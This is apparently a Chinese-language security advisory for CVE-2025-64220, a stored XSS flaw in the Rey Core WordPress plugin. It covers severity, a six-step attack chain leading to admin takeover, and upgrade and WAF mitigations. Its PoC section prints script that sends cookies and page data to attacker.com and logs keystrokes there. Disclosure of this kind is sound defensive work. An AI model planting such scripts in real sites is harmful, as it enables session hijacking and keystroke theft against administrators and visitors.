CVE-2025-64220 Rey Core WordPress插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64220

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ReyCommerce Rey Core (WordPress插件)

漏洞概述

CVE-2025-64220是WordPress Rey Core插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞由于应用程序在生成Web页面时未能正确对用户输入进行中和处理，导致恶意脚本可以被永久存储在服务器端。当其他用户访问包含恶意脚本的页面时，攻击者注入的JavaScript代码将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。 Rey Core是WordPress平台上广泛使用的付费主题/框架插件，主要用于构建电子商务网站。该漏洞影响版本从n/a至3.1.8版本，CVSS评分6.5，属于中等严重程度。攻击者需要具有低权限用户账户（如订阅者或贡献者角色），并需要诱导管理员或高权限用户访问包含恶意脚本的页面。由于是存储型XSS，攻击一旦成功，恶意脚本将持续存在于网站中，影响所有访问该页面的用户。漏洞由Patchstack安全团队发现并报告。

技术细节

该存储型XSS漏洞存在于Rey Core插件的某个输入字段中，攻击者可以通过该字段提交包含恶意JavaScript代码的Payload。当数据被存储到数据库后，每次页面加载时该Payload都会被重新读取并渲染到HTML中。由于缺乏适当的输入验证和输出编码，恶意脚本得以在用户浏览器中执行。攻击者利用此漏洞可以：(1)窃取受害者的会话令牌和认证Cookie；(2)修改页面内容进行钓鱼攻击；(3)重定向用户到恶意网站；(4)在受害者浏览器中执行任意JavaScript代码。由于攻击需要低权限账户即可实施，且可以利用社交工程诱导管理员访问恶意页面，因此该漏洞在实际环境中具有较高的利用可能性。攻击者可能首先创建一个低权限账户，然后利用该漏洞注入恶意脚本，等待管理员访问受感染页面后即可获得管理员权限。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本及Rey Core插件版本，确认版本是否在受影响范围内（<=3.1.8）

STEP 2

Account Creation

攻击者注册一个低权限WordPress用户账户（如订阅者角色），该账户具有在网站上提交内容的权限

STEP 3

Payload Injection

攻击者利用Rey Core插件的漏洞输入点，提交包含恶意JavaScript代码的Payload，该Payload被存储到数据库中

STEP 4

Social Engineering

攻击者通过社会工程手段诱导高权限用户（管理员）访问包含恶意脚本的页面

STEP 5

Script Execution

当管理员访问受感染页面时，恶意JavaScript代码在其浏览器中执行，窃取会话Cookie或执行其他恶意操作

STEP 6

Account Takeover

攻击者使用窃取的Cookie劫持管理员会话，获得网站完全控制权，可进一步部署后门或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-64220 -->
<!-- Attack requires low-privilege account -->

<!-- Step 1: Inject malicious script via vulnerable input field -->
<script>
  // Cookie stealing payload
  var cookies = document.cookie;
  var img = new Image();
  img.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookies);
  
  // Alternative: Session hijacking via fetch API
  fetch('https://attacker.com/exfiltrate', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookies: document.cookie,
      url: window.location.href,
      userAgent: navigator.userAgent
    })
  });
  
  // Keylogger payload
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
  });
</script>

<!-- Step 2: When admin visits the page, the script executes -->
<!-- Attacker receives admin cookies and can hijack the session -->

影响范围

Rey Core <= 3.1.8

防御指南

临时缓解措施

立即将Rey Core插件升级到3.1.9或更高版本。如果无法立即升级，可以暂时禁用该插件或使用Web应用防火墙(WAF)规则阻止恶意请求。在管理员访问后台时启用双因素认证以降低账户劫持风险。同时建议审查所有用户提交的内容，删除已存在的恶意Payload。